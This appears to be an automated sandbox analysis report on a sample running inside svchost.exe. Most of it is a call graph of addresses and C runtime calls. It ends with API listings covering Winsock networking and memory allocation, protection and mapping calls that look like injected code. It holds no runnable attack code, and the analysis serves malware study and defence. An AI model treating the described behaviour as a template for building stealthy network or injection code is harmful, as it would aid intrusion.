5b6e246 13320->13323 13321->13314 13324 5b6e25d __cfltcvt 13323->13324 13326 5b6e3b1 13323->13326 13324->13326 13327 5b71fde 13324->13327 13326->13321 13328 5b71fec 13327->13328 13330 5b72015 13327->13330 13329 5b78f25 memset memset memset memset 13328->13329 13329->13330 13330->13326 13345 5b6d9c0 13331->13345 13333 5b6d9bb 13333->13255 13335 5b720b2 13334->13335 13337 5b6d7ce 13334->13337 13336 5b720cb calloc 13335->13336 13335->13337 13336->13337 13337->13258 13337->13267 13340 5b72223 _mbstowcs_s 13338->13340 13341 5b72191 13338->13341 13339 5b721fb memset memset 13339->13340 13340->13263 13341->13339 13341->13340 13343 5b71e69 memset 13342->13343 13344 5b6d939 13342->13344 13343->13344 13344->13266 13344->13267 13357 5b7204f memset 13345->13357 13347 5b6d9e6 _mbstowcs_s 13347->13333 13348 5b6d9d5 __cfltcvt 13348->13347 13349 5b6d9f6 strlen 13348->13349 13349->13347 13350 5b6da19 strlen 13349->13350 13351 5b6da34 __cfltcvt 13350->13351 13352 5b720a8 calloc 13351->13352 13353 5b6da5b 13352->13353 13353->13347 13354 5b7217f 2 API calls 13353->13354 13356 5b6da75 13354->13356 13355 5b72060 free 13355->13347 13356->13355 13357->13348 13359 5b6e813 13358->13359 13364 5b6e82a 13358->13364 13360 5b6e4a0 4 API calls 13359->13360 13362 5b6e68e 13360->13362 13361 5b6e950 13363 5b6e4a0 4 API calls 13361->13363 13362->13150 13375 5b74016 13362->13375 13363->13362 13364->13361 13365 5b6e87d calloc 13364->13365 13370 5b6e86f free 13364->13370 13366 5b6e8b3 13365->13366 13367 5b6e89c 13365->13367 13381 5b747b2 memset 13366->13381 13368 5b6e4a0 4 API calls 13367->13368 13368->13362 13370->13365 13372 5b6e8b9 13372->13361 13372->13362 13373 5b6e92e 13372->13373 13382 5b7364e 13372->13382 13374 5b6e4a0 4 API calls 13373->13374 13374->13362 13376 5b74031 13375->13376 13378 5b74059 13376->13378 13380 5b74039 13376->13380 13467 5b7463b strlen 13376->13467 13474 5b7418e 13378->13474 13380->13148 13381->13372 13383 5b736a7 13382->13383 13386 5b73663 13382->13386 13383->13372 13384 5b736b6 13393 5b736fd memset memset memset 13384->13393 13386->13383 13386->13384 13388 5b7368e calloc 13386->13388 13387 5b736c9 13387->13383 13391 5b736e2 free 13387->13391 13388->13383 13389 5b736ae 13388->13389 13392 5b747b2 memset 13389->13392 13391->13383 13392->13384 13394 5b7373a _mbstowcs_s 13393->13394 13399 5b73768 13393->13399 13395 5b73782 calloc 13394->13395 13394->13399 13396 5b737a8 __cfltcvt _mbstowcs_s 13395->13396 13395->13399 13396->13399 13407 5b7b613 13396->13407 13398 5b73881 _mbstowcs_s 13398->13399 13412 5b7b82a 13398->13412 13399->13387 13401 5b7397c 13401->13399 13403 5b739eb 13401->13403 13423 5b73bb0 13401->13423 13403->13399 13404 5b73a23 memcmp 13403->13404 13404->13399 13405 5b73a36 13404->13405 13405->13399 13406 5b73a42 memcmp 13405->13406 13406->13399 13408 5b7b625 13407->13408 13409 5b7b61e 13407->13409 13429 5b7c376 13408->13429 13409->13398 13413 5b7b849 _mbstowcs_s 13412->13413 13422 5b7b850 13413->13422 13432 5b7bea4 memset 13413->13432 13415 5b7b86e 13416 5b7b8e6 13415->13416 13417 5b7b8d5 13415->13417 13415->13422 13416->13422 13444 5b7b948 13416->13444 13436 5b7bdcc 13417->13436 13422->13401 13424 5b73bc3 13423->13424 13426 5b73bca _mbstowcs_s 13423->13426 13424->13403 13426->13424 13457 5b7c2be 13426->13457 13460 5b73ef6 13426->13460 13463 5b73f2c 13426->13463 13430 5b7c329 memcmp 13429->13430 13431 5b7b633 13430->13431 13431->13398 13433 5b7bec9 13432->13433 13434 5b7c39d memcmp 13433->13434 13435 5b7bed0 13433->13435 13434->13435 13435->13415 13438 5b7bde5 _mbstowcs_s 13436->13438 13437 5b7bdf7 13437->13422 13438->13437 13439 5b7947f free calloc free memset 13438->13439 13440 5b7be2a _mbstowcs_s 13439->13440 13440->13437 13441 5b7947f free calloc free memset 13440->13441 13442 5b7be66 13441->13442 13442->13437 13443 5b79540 7 API calls 13442->13443 13443->13437 13445 5b7b96a 13444->13445 13446 5b7b958 13444->13446 13448 5b7b997 6 API calls 13445->13448 13447 5b7c408 memcmp 13446->13447 13449 5b7b95d 13447->13449 13448->13449 13450 5b7c4aa free free 13449->13450 13451 5b7b90c 13449->13451 13450->13451 13451->13422 13452 5b7bd90 13451->13452 13453 5b763ec free calloc free memset 13452->13453 13454 5b7bdb2 13453->13454 13455 5b7bdc0 13454->13455 13456 5b77fe1 __cfltcvt 5 API calls 13454->13456 13455->13422 13456->13455 13458 5b7c2dc memcmp 13457->13458 13459 5b7c2c7 13458->13459 13459->13426 13461 5b7c175 calloc 13460->13461 13462 5b73f0b 13461->13462 13462->13426 13466 5b73f47 _mbstowcs_s 13463->13466 13464 5b73f4e 13464->13426 13465 5b73fb5 calloc 13465->13464 13465->13466 13466->13464 13466->13465 13471 5b7467b 13467->13471 13472 5b74657 13467->13472 13468 5b74679 13468->13378 13469 5b74688 memcmp 13469->13471 13471->13468 13471->13469 13473 5b746c7 strlen 13471->13473 13472->13468 13482 5b746c7 13472->13482 13473->13471 13481 5b741a8 13474->13481 13477 5b742c2 13477->13380 13481->13477 13489 5b7b6c9 13481->13489 13492 5b7b801 13481->13492 13495 5b745ed 13481->13495 13500 5b74409 13481->13500 13504 5b742f6 13481->13504 13483 5b746d5 13482->13483 13486 5b746e9 13483->13486 13487 5b746fd strlen 13483->13487 13485 5b746f5 13485->13472 13486->13472 13488 5b74716 13487->13488 13488->13485 13509 5b7b6f2 time 13489->13509 13491 5b7b6d8 13491->13481 13493 5b7b6f2 2 API calls 13492->13493 13494 5b7b810 13493->13494 13494->13481 13496 5b742f6 2 API calls 13495->13496 13497 5b74600 13496->13497 13498 5b74631 13497->13498 13499 5b74616 memcmp 13497->13499 13498->13481 13499->13497 13499->13498 13502 5b7441d 13500->13502 13503 5b74457 13502->13503 13514 5b74469 13502->13514 13503->13481 13508 5b74300 13504->13508 13505 5b7434c 13505->13481 13506 5b74316 memcmp 13506->13505 13506->13508 13508->13505 13508->13506 13528 5b7435a 13508->13528 13512 5b72396 gmtime 13509->13512 13511 5b7b712 13511->13491 13513 5b723a8 __cfltcvt 13512->13513 13513->13511 13516 5b74487 13514->13516 13520 5b74507 13514->13520 13518 5b7b6c9 2 API calls 13516->13518 13519 5b7b801 2 API calls 13516->13519 13516->13520 13521 5b745b3 13516->13521 13524 5b74528 13516->13524 13518->13516 13519->13516 13520->13502 13522 5b742f6 memcmp memcmp 13521->13522 13523 5b745c9 13522->13523 13523->13516 13526 5b7453f __cfltcvt 13524->13526 13525 5b74573 13525->13516 13526->13525 13527 5b734c4 15 API calls 13526->13527 13527->13525 13529 5b7436a 13528->13529 13531 5b74385 13528->13531 13530 5b74372 memcmp 13529->13530 13529->13531 13530->13531 13531->13508 13545 5b74aac 13532->13545 13534 5b75b66 13534->13162 13536 5b6f78e __cfltcvt 13535->13536 13582 5b7204f memset 13536->13582 13538 5b6f7a7 13539 5b720a8 calloc 13538->13539 13543 5b6f7b3 13539->13543 13540 5b72060 free 13541 5b6f81d 13540->13541 13542 5b6f82c 13541->13542 13544 5b6e4a0 4 API calls 13541->13544 13542->13166 13543->13540 13544->13542 13546 5b74ac3 13545->13546 13547 5b74ae7 13546->13547 13551 5b74a0f 13546->13551 13547->13534 13557 5b74a1f 13551->13557 13554 5b74aed 13566 5b76479 13554->13566 13556 5b74b0a 13556->13547 13560 5b7c4aa 13557->13560 13559 5b74a1c 13559->13547 13559->13554 13561 5b761e1 free free 13560->13561 13562 5b7c4b5 13561->13562 13563 5b761e1 free free 13562->13563 13564 5b7c4d2 13562->13564 13565 5b7c4ca 13563->13565 13564->13559 13565->13559 13567 5b764b4 13566->13567 13568 5b76483 13566->13568 13567->13556 13568->13567 13571 5b763ec 13568->13571 13572 5b763f7 13571->13572 13573 5b7640d 13571->13573 13574 5b763ff 13572->13574 13576 5b76410 __cfltcvt 13572->13576 13573->13556 13574->13573 13575 5b762d4 __cfltcvt calloc free memset 13574->13575 13575->13573 13576->13573 13577 5b6fbd8 _mbstowcs_s free calloc free memset 13576->13577 13578 5b7644a 13577->13578 13578->13573 13579 5b6fbd8 _mbstowcs_s free calloc free memset 13578->13579 13580 5b76460 13579->13580 13580->13573 13581 5b6fab6 _mbstowcs_s calloc free memset 13580->13581 13581->13573 13582->13538 13589 5b74b36 13583->13589 13586 5b74b83 13630 5b74ba4 13586->13630 13590 5b74b31 13589->13590 13591 5b74b4b 13589->13591 13590->13191 13590->13586 13595 5b748b4 13591->13595 13602 5b748d2 13595->13602 13598 5b764bb 13599 5b764cf 13598->13599 13600 5b764c8 13598->13600 13618 5b7631d 13599->13618 13600->13590 13607 5b78268 13602->13607 13605 5b748cd 13605->13590 13605->13598 13608 5b748e8 13607->13608 13610 5b78287 __cfltcvt _mbstowcs_s 13607->13610 13608->13605 13612 5b7654c 13608->13612 13609 5b71929 _mbstowcs_s free calloc free memset 13609->13610 13610->13608 13610->13609 13611 5b6fe33 _mbstowcs_s calloc free memset 13610->13611 13611->13610 13613 5b7655c __cfltcvt 13612->13613 13614 5b77fe1 __cfltcvt 5 API calls 13613->13614 13617 5b7659a 13613->13617 13615 5b7656b 13614->13615 13616 5b765a0 __cfltcvt 12 API calls 13615->13616 13615->13617 13616->13617 13617->13605 13620 5b76336 __cfltcvt 13618->13620 13619 5b7633c 13619->13600 13620->13619 13621 5b7636a 13620->13621 13624 5b763a7 __cfltcvt 13620->13624 13621->13619 13627 5b6fcb6 13621->13627 13624->13619 13625 5b6fcb6 __cfltcvt memset 13624->13625 13625->13619 13626 5b6fcb6 __cfltcvt memset 13626->13619 13628 5b6fccc memset 13627->13628 13629 5b6fce5 13627->13629 13628->13629 13629->13619 13629->13626 13631 5b74bb0 13630->13631 13635 5b74b9f 13630->13635 13631->13635 13636 5b7490e 13631->13636 13633 5b74bd4 __cfltcvt 13634 5b6fcb6 __cfltcvt memset 13633->13634 13633->13635 13634->13635 13635->13189 13639 5b7492f 13636->13639 13640 5b7493f __cfltcvt 13639->13640 13641 5b7654c __cfltcvt 12 API calls 13640->13641 13644 5b7495a __cfltcvt 13641->13644 13642 5b74971 13643 5b761bb __cfltcvt free 13642->13643 13645 5b7492a 13643->13645 13644->13642 13647 5b6f98a 13644->13647 13645->13633 13648 5b6f9a0 13647->13648 13652 5b6f9ad __cfltcvt 13647->13652 13649 5b6f9a7 13648->13649 13650 5b6f9b2 13648->13650 13651 5b6f848 _mbstowcs_s free 13649->13651 13653 5b6f9e7 memset 13650->13653 13654 5b6f9d5 13650->13654 13651->13652 13652->13642 13653->13652 13655 5b6f891 __cfltcvt calloc free 13654->13655 13655->13652 13657 5b6f46f 2 API calls 13656->13657 13658 5b6eb11 13657->13658 13659 5b6eafe 13658->13659 13660 5b6f42f free 13658->13660 13659->13074 13660->13659 14084 5b69c78 14085 5b69c81 14084->14085 14086 5b69c8b 14084->14086 14087 5b69c8e 5 API calls 14085->14087 14087->14086 12763 5b65365 12766 5b65378 12763->12766 12767 5b65382 12766->12767 12770 5b6a83a 12767->12770 12769 5b65376 12771 5b6a856 12770->12771 12772 5b6a846 12770->12772 12771->12772 12775 5b6afe4 12771->12775 12772->12769 12776 5b6b011 12775->12776 12777 5b6b047 12776->12777 12778 5b6b03a CreateEventA 12776->12778 12780 5b6a87b 12776->12780 12781 5b6b055 memset 12777->12781 12778->12777 12780->12769 12782 5b6b082 memset 12781->12782 12784 5b6b0c6 12782->12784 12785 5b6b0ce WSARecv 12782->12785 12784->12785 12786 5b6b110 GetLastError 12785->12786 12787 5b6b0f0 12785->12787 12786->12787 12788 5b6b11d WSAGetLastError 12786->12788 12791 5b6b16b RegisterWaitForSingleObject 12787->12791 12792 5b6b0fa 12787->12792 12789 5b6b127 WSAGetLastError 12788->12789 12790 5b6b12f WSAGetLastError 12788->12790 12789->12792 12790->12792 12791->12792 12792->12780 13860 5b634ef 13861 5b634fe 13860->13861 13864 5b63514 13861->13864 13866 5b642ec 13861->13866 13863 5b63554 13864->13863 13896 5b6210e 13864->13896 13867 5b64308 __cfltcvt 13866->13867 13868 5b64317 inet_addr 13867->13868 13869 5b64333 13868->13869 13870 5b6449b 13868->13870 13903 5b6a59e 13869->13903 13873 5b644b7 htons 13870->13873 13872 5b64347 13874 5b64351 13872->13874 13875 5b6438b strlen calloc 13872->13875 13877 5b64383 13873->13877 13878 5b6436a htons 13874->13878 13876 5b643b1 13875->13876 13895 5b64475 13875->13895 13910 5b620bf memset 13876->13910 13877->13864 13878->13877 13880 5b643ba 13881 5b643d0 memset strlen 13880->13881 13882 5b66453 3 API calls 13881->13882 13883 5b643f8 13882->13883 13884 5b6447a 13883->13884 13911 5b641f6 13883->13911 13924 5b620d9 13884->13924 13889 5b64a6e free 13890 5b6448c free 13889->13890 13890->13895 13893 5b6444b 13894 5b6210e 69 API calls 13893->13894 13894->13895 13895->13877 13939 5b62258 malloc 13896->13939 13898 5b62126 13941 5b66594 malloc 13898->13941 13900 5b6214a 13944 5b622bc malloc 13900->13944 13904 5b6a5c7 13903->13904 13905 5b6a5a8 13903->13905 13935 5b6a5d6 13904->13935 13907 5b6a5ad 13905->13907 13928 5b6a6a3 memset 13905->13928 13907->13872 13908 5b6a5c5 13908->13872 13910->13880 13912 5b6421a __cfltcvt 13911->13912 13913 5b64226 memset getaddrinfo 13912->13913 13914 5b642db 13913->13914 13917 5b64263 __cfltcvt 13913->13917 13914->13884 13919 5b61a2b 13914->13919 13915 5b642d2 FreeAddrInfoW 13915->13914 13916 5b6428c 13916->13915 13917->13915 13917->13916 13918 5b642bd htons 13917->13918 13918->13915 13922 5b61a41 __cfltcvt 13919->13922 13920 5b61a7f strchr 13921 5b61a9d strlen 13920->13921 13920->13922 13921->13922 13922->13920 13923 5b61ac7 13922->13923 13923->13884 13923->13893 13925 5b6210a 13924->13925 13926 5b620e9 13924->13926 13925->13889 13926->13925 13927 5b620f6 free 13926->13927 13927->13926 13931 5b6a6cc 13928->13931 13929 5b6a6f3 strchr 13930 5b6a709 strchr 13929->13930 13929->13931 13930->13931 13931->13929 13932 5b6a7f4 13931->13932 13934 5b6a794 __cfltcvt 13931->13934 13933 5b6a5d6 strchr 13932->13933 13932->13934 13933->13934 13934->13908 13936 5b6a5fb 13935->13936 13938 5b6a66f __cfltcvt 13935->13938 13937 5b6a600 strchr 13936->13937 13936->13938 13937->13936 13938->13908 13940 5b62272 13939->13940 13940->13898 13942 5b665a4 memset 13941->13942 13943 5b665c6 13941->13943 13942->13943 13943->13900 13945 5b622cc 13944->13945 13948 5b62303 13945->13948 13953 5b64fc6 13948->13953 13951 5b62180 13951->13863 13952 5b6234d free 13952->13951 13963 5b64f50 malloc 13953->13963 13955 5b64fd7 13956 5b65024 __cfltcvt 13955->13956 13957 5b64fe8 __cfltcvt 13955->13957 13961 5b6231d 13955->13961 13969 5b6be45 13956->13969 13957->13961 13973 5b6be87 13957->13973 13959 5b6501f 13959->13961 13962 5b6508a 38 API calls 13959->13962 13961->13951 13961->13952 13962->13961 13964 5b64f68 13963->13964 13965 5b64f6f free 13964->13965 13966 5b64f7b 13964->13966 13965->13955 13977 5b64f8b malloc memset 13966->13977 13968 5b64f87 13968->13955 13970 5b6be53 13969->13970 13972 5b6be72 13969->13972 13970->13972 13979 5b6b1b1 13970->13979 13972->13959 13974 5b6be95 13973->13974 13976 5b6beb5 13973->13976 13974->13976 14027 5b6b314 13974->14027 13976->13959 13978 5b64fad 13977->13978 13978->13968 13980 5b6b1d2 13979->13980 13985 5b6b1c9 13979->13985 13981 5b6b1eb 13980->13981 13990 5b6bdce 13980->13990 13983 5b6b21e memset 13981->13983 13981->13985 13994 5b6bf21 13981->13994 13987 5b6b25d 13983->13987 13985->13972 13987->13985 13988 5b6b2af GetLastError 13987->13988 13988->13985 13989 5b6b2bc WSAGetLastError 13988->13989 13989->13985 13991 5b6bdda 13990->13991 13993 5b6bdf5 13990->13993 13991->13993 13997 5b6ab5a 13991->13997 13993->13981 14025 5b6bee9 WSAIoctl 13994->14025 14000 5b6ab70 13997->14000 13999 5b6ab6c 13999->13993 14001 5b6abe7 bind 14000->14001 14002 5b6ab7e socket 14000->14002 14003 5b6abfb WSAGetLastError 14001->14003 14008 5b6ab98 14001->14008 14004 5b6ab92 WSAGetLastError 14002->14004 14005 5b6aba8 SetHandleInformation 14002->14005 14003->14008 14004->14008 14006 5b6abb7 GetLastError 14005->14006 14007 5b6abd1 14005->14007 14009 5b6abc6 14006->14009 14013 5b6ac1b ioctlsocket 14007->14013 14008->13999 14012 5b6abc8 closesocket 14009->14012 14011 5b6abe0 14011->14001 14011->14012 14012->14008 14014 5b6ac57 CreateIoCompletionPort 14013->14014 14015 5b6ac41 WSAGetLastError 14013->14015 14016 5b6ac73 14014->14016 14020 5b6ac79 14014->14020 14022 5b6ac47 14015->14022 14017 5b6acaf GetLastError 14016->14017 14016->14020 14017->14022 14018 5b6aca9 14019 5b6acdc 14018->14019 14021 5b6ad14 setsockopt _errno 14018->14021 14018->14022 14019->14022 14024 5b6ad4b _errno 14019->14024 14020->14018 14023 5b6aca0 SetFileCompletionNotificationModes 14020->14023 14021->14019 14022->14011 14023->14018 14024->14022 14026 5b6b20e 14025->14026 14026->13983 14026->13985 14028 5b6b335 14027->14028 14037 5b6b32c 14027->14037 14029 5b6b34f 14028->14029 14038 5b6be09 14028->14038 14031 5b6b382 memset 14029->14031 14032 5b6bf21 WSAIoctl 14029->14032 14029->14037 14034 5b6b3c1 14031->14034 14033 5b6b372 14032->14033 14033->14031 14033->14037 14035 5b6b413 GetLastError 14034->14035 14034->14037 14036 5b6b420 WSAGetLastError 14035->14036 14035->14037 14036->14037 14037->13976 14039 5b6be15 14038->14039 14041 5b6be31 14038->14041 14039->14041 14042 5b6ada5 14039->14042 14041->14029 14043 5b6ab70 15 API calls 14042->14043 14044 5b6adb7 14043->14044 14044->14041 12695 5b6a4d6 12696 5b6a4e5 12695->12696 12704 5b6a502 12695->12704 12697 5b6a570 abort 12696->12697 12698 5b6a507 12696->12698 12699 5b6a510 12696->12699 12700 5b6a4fb 12696->12700 12696->12704 12717 5b6cd86 12698->12717 12721 5b6cbd9 12699->12721 12705 5b6bb4c 12700->12705 12706 5b6bb64 12705->12706 12707 5b6bb88 12705->12707 12708 5b6bb77 12706->12708 12709 5b6bb6b shutdown 12706->12709 12710 5b6bb7d 12707->12710 12712 5b6bc89 2 API calls 12707->12712 12725 5b6bc89 12708->12725 12709->12710 12713 5b6bc3b closesocket 12710->12713 12715 5b6bc48 12710->12715 12714 5b6bb9b 12712->12714 12713->12715 12714->12710 12716 5b6bbc4 closesocket 12714->12716 12715->12704 12716->12714 12730 5b6beca 12717->12730 12719 5b6cd91 closesocket 12720 5b6cda2 12719->12720 12720->12704 12722 5b6cbe8 12721->12722 12724 5b6cbed 12721->12724 12732 5b6cbf7 12722->12732 12724->12704 12726 5b6bca1 12725->12726 12727 5b6bccf CancelIo 12726->12727 12728 5b6bcac WSAIoctl 12726->12728 12727->12710 12728->12727 12729 5b6bcca 12728->12729 12729->12710 12731 5b6bed4 12730->12731 12731->12719 12733 5b6cc0b 12732->12733 12734 5b6cc32 12733->12734 12736 5b6cc58 12733->12736 12734->12724 12741 5b6ccc4 12736->12741 12740 5b6cc99 12740->12734 12754 5b69c78 12741->12754 12744 5b6c391 12745 5b6c3b1 CreateEventA 12744->12745 12747 5b6c3a2 12744->12747 12746 5b6c41a 12745->12746 12745->12747 12746->12740 12748 5b6c3f6 WaitForSingleObject 12747->12748 12749 5b6c422 CloseHandle 12747->12749 12753 5b6c429 12747->12753 12751 5b6c404 GetLastError CloseHandle WSASetLastError 12748->12751 12752 5b6c41f 12748->12752 12749->12753 12750 5b6c445 WSASetLastError 12750->12746 12751->12746 12752->12749 12753->12750 12755 5b69c81 12754->12755 12756 5b69c8b 12754->12756 12758 5b69c8e CreateEventA InterlockedCompareExchange 12755->12758 12756->12744 12759 5b69cba SetEvent 12758->12759 12760 5b69cc9 CloseHandle WaitForSingleObject 12758->12760 12761 5b69cdb 12759->12761 12760->12761 12761->12756 14069 5b6355a 14070 5b63567 14069->14070 14074 5b63574 14069->14074 14071 5b641f6 4 API calls 14070->14071 14073 5b6356e 14071->14073 14072 5b635b7 14073->14074 14075 5b635bc 14073->14075 14074->14072 14076 5b6210e 69 API calls 14074->14076 14078 5b635c6 14075->14078 14076->14072 14083 5b635e4 14078->14083 14079 5b63634 14081 5b6a4d6 19 API calls 14079->14081 14082 5b63653 14079->14082 14080 5b64a6e free 14080->14079 14081->14082 14082->14072 14083->14079 14083->14080

                                                                                    Executed Functions

                                                                                    Function 05B6B055 Relevance: 12.1, APIs: 8, Instructions: 122networkregistryCOMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    APIs
                                                                                    • memset.MSVCRT ref: 05B6B06C
                                                                                    • memset.MSVCRT ref: 05B6B0B8
                                                                                    • WSARecv.WS2_32(FFE0458D,00000000,00000001,?,00000000,05B628E9,00000000), ref: 05B6B0E6
                                                                                    • GetLastError.KERNEL32(?,?,?,?,?,00000001), ref: 05B6B110
                                                                                    • WSAGetLastError.WS2_32(?,?,?,?,?,00000001), ref: 05B6B11D
                                                                                    • WSAGetLastError.WS2_32(?,?,?,?,?,00000001), ref: 05B6B127
                                                                                    • WSAGetLastError.WS2_32(?,?,?,?,?,00000001), ref: 05B6B12F
                                                                                    • RegisterWaitForSingleObject.KERNEL32(05B62909,30C48300,05B6AF9E,05B628D9,000000FF,00000004), ref: 05B6B179
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000B.00000002.3011097833.0000000005B61000.00000020.00001000.00020000.00000000.sdmp, Offset: 05B61000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_11_2_5b61000_svchost.jbxd
                                                                                    Similarity
                                                                                    • API ID: ErrorLast$memset$ObjectRecvRegisterSingleWait
                                                                                    • String ID:
                                                                                    • API String ID: 2020750497-0
                                                                                    • Opcode ID: 44410584066b7b378d08e99231bbb2ad98d59eb3135315bb2534645fa2f6e43e
                                                                                    • Instruction ID: 5c86ea3b5c9185a031bedd13ffacdecb9f8b36a8b9f7a3e23dcf393d3397130a
                                                                                    • Opcode Fuzzy Hash: 44410584066b7b378d08e99231bbb2ad98d59eb3135315bb2534645fa2f6e43e
                                                                                    • Instruction Fuzzy Hash: 45419A31620609BFE7219F24CC49BAABBF9FF04314F208669E952DA590D778F615CB90
                                                                                    Function 05B6AB70 Relevance: 10.6, APIs: 7, Instructions: 64networkCOMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 133 5b6ab70-5b6ab7c 134 5b6abe7-5b6abf9 bind 133->134 135 5b6ab7e-5b6ab90 socket 133->135 136 5b6ac11-5b6ac15 134->136 137 5b6abfb-5b6ac08 WSAGetLastError 134->137 138 5b6ab92 WSAGetLastError 135->138 139 5b6aba8-5b6abb5 SetHandleInformation 135->139 144 5b6ac17-5b6ac1a 136->144 142 5b6ac0a-5b6ac0e 137->142 143 5b6ab98-5b6aba2 call 5b6bd00 137->143 138->143 140 5b6abb7-5b6abc7 GetLastError call 5b6bd00 139->140 141 5b6abd1-5b6abdb call 5b6ac1b 139->141 152 5b6abc8-5b6abcf closesocket 140->152 150 5b6abe0-5b6abe5 141->150 142->136 151 5b6aba3-5b6aba6 143->151 150->134 150->152 151->144 152->151
                                                                                    APIs
                                                                                    • socket.WS2_32(00000010,00000001,00000000), ref: 05B6AB85
                                                                                    • WSAGetLastError.WS2_32(?,?,?,05B6AB6C,05B6BDF5,00000002,05B6BDF5,00000010,05B6BDF5,05B6BE72), ref: 05B6AB92
                                                                                      • Part of subcall function 05B6AC1B: ioctlsocket.WS2_32(05B6BDF5,8004667E,05B6BE72), ref: 05B6AC36
                                                                                      • Part of subcall function 05B6AC1B: WSAGetLastError.WS2_32(?,?,05B6ABE0,17E80870,05B6BDF5,00000000,00000010,00000000,?,?,?,05B6AB6C,05B6BDF5,00000002,05B6BDF5,00000010), ref: 05B6AC41
                                                                                    • SetHandleInformation.KERNEL32(00000000,00000001,00000000,?,?,?,05B6AB6C,05B6BDF5,00000002,05B6BDF5,00000010,05B6BDF5,05B6BE72), ref: 05B6ABAD
                                                                                    • GetLastError.KERNEL32(?,?,?,05B6AB6C,05B6BDF5,00000002,05B6BDF5,00000010,05B6BDF5,05B6BE72), ref: 05B6ABB7
                                                                                    • closesocket.WS2_32(00000000), ref: 05B6ABC9
                                                                                    • bind.WS2_32(50A5A5A5,05B6BDF5,00000002), ref: 05B6ABF0
                                                                                    • WSAGetLastError.WS2_32(?,?,?,05B6AB6C,05B6BDF5,00000002,05B6BDF5,00000010,05B6BDF5,05B6BE72), ref: 05B6ABFB
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000B.00000002.3011097833.0000000005B61000.00000020.00001000.00020000.00000000.sdmp, Offset: 05B61000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_11_2_5b61000_svchost.jbxd
                                                                                    Similarity
                                                                                    • API ID: ErrorLast$HandleInformationbindclosesocketioctlsocketsocket
                                                                                    • String ID:
                                                                                    • API String ID: 2417539845-0
                                                                                    • Opcode ID: 548ff8c268fde8c1fac98911efbb57134668e6656e1717f94cc667dfee514cd1
                                                                                    • Instruction ID: d4b7c8e7fb58dfb8b40013ffe46996b94edacf07b80f92bdc28eb15e580c526a
                                                                                    • Opcode Fuzzy Hash: 548ff8c268fde8c1fac98911efbb57134668e6656e1717f94cc667dfee514cd1
                                                                                    • Instruction Fuzzy Hash: C7114C35214604ABDF261A74EC0AF7A7FA7FB01730F248659F662A50E0DB75B440DA51
                                                                                    Function 05B632B0 Relevance: 19.7, APIs: 13, Instructions: 194stringCOMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000B.00000002.3011097833.0000000005B61000.00000020.00001000.00020000.00000000.sdmp, Offset: 05B61000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_11_2_5b61000_svchost.jbxd
                                                                                    Similarity
                                                                                    • API ID: callocfree$memsetstrlen$sprintfsrandtime
                                                                                    • String ID:
                                                                                    • API String ID: 2846687148-0
                                                                                    • Opcode ID: 6fc778670947596458672facb983c792e6dcb3c109d9da9770ef3b3550a21ae5
                                                                                    • Instruction ID: 70f9e3308efad5a4f8a7c33dbe37e84c0a46e7661574922dbcc25597986ec95c
                                                                                    • Opcode Fuzzy Hash: 6fc778670947596458672facb983c792e6dcb3c109d9da9770ef3b3550a21ae5
                                                                                    • Instruction Fuzzy Hash: A5713A74900609AFDB20DF65D885AAEBBF9FF08300F10496EE95A97640D774BA44CB61
                                                                                    Function 032C02D8 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 169memoryfileCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004,00000000,?,?), ref: 032C0326
                                                                                      • Part of subcall function 032C00A4: VirtualAlloc.KERNELBASE(00000000,00001012,00001000,00000004), ref: 032C00CD
                                                                                      • Part of subcall function 032C00A4: VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 032C0279
                                                                                    • VirtualAlloc.KERNELBASE(00000000,00400000,00001000,00000004), ref: 032C0378
                                                                                    • VirtualProtect.KERNELBASE(0000002C,?,00000040,?), ref: 032C03E7
                                                                                    • VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 032C0407
                                                                                    • MapViewOfFile.KERNELBASE(?,00000004,00000000,00000000,00000000), ref: 032C042E
                                                                                    • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 032C0456
                                                                                    • CloseHandle.KERNELBASE(?), ref: 032C0471
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000B.00000003.2196728803.00000000032C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 032C0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_11_3_32c0000_svchost.jbxd
                                                                                    Similarity
                                                                                    • API ID: Virtual$Alloc$Free$CloseFileHandleProtectView
                                                                                    • String ID: ,
                                                                                    • API String ID: 3867569247-3772416878
                                                                                    • Opcode ID: 35eb397ea14406336b01ea38f36e06f8461e94550e7b98cd084062937234d485
                                                                                    • Instruction ID: 276caa0192d064cea6aa1924d413df92dacd0dabf0d9d0b62d370ca76f8227b3
                                                                                    • Opcode Fuzzy Hash: 35eb397ea14406336b01ea38f36e06f8461e94550e7b98cd084062937234d485
                                                                                    • Instruction Fuzzy Hash: 4A61FCB5910249EFDB20DFA5C884ADEFBB9FF08354F14C519E959A7240D770E981CB60
                                                                                    Function 05B6992A Relevance: 13.6, APIs: 9, Instructions: 99networkCOMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    APIs
                                                                                    • SetErrorMode.KERNELBASE(00008003), ref: 05B6992F
                                                                                    • WSAStartup.WS2_32(00000202,?), ref: 05B6BF91
                                                                                      • Part of subcall function 05B6BD3A: memset.MSVCRT ref: 05B6BD4A
                                                                                      • Part of subcall function 05B6BD3A: htons.WS2_32(00000002), ref: 05B6BD5B
                                                                                      • Part of subcall function 05B6BD3A: inet_addr.WS2_32(?), ref: 05B6BD68
                                                                                      • Part of subcall function 05B6BD81: memset.MSVCRT ref: 05B6BD91
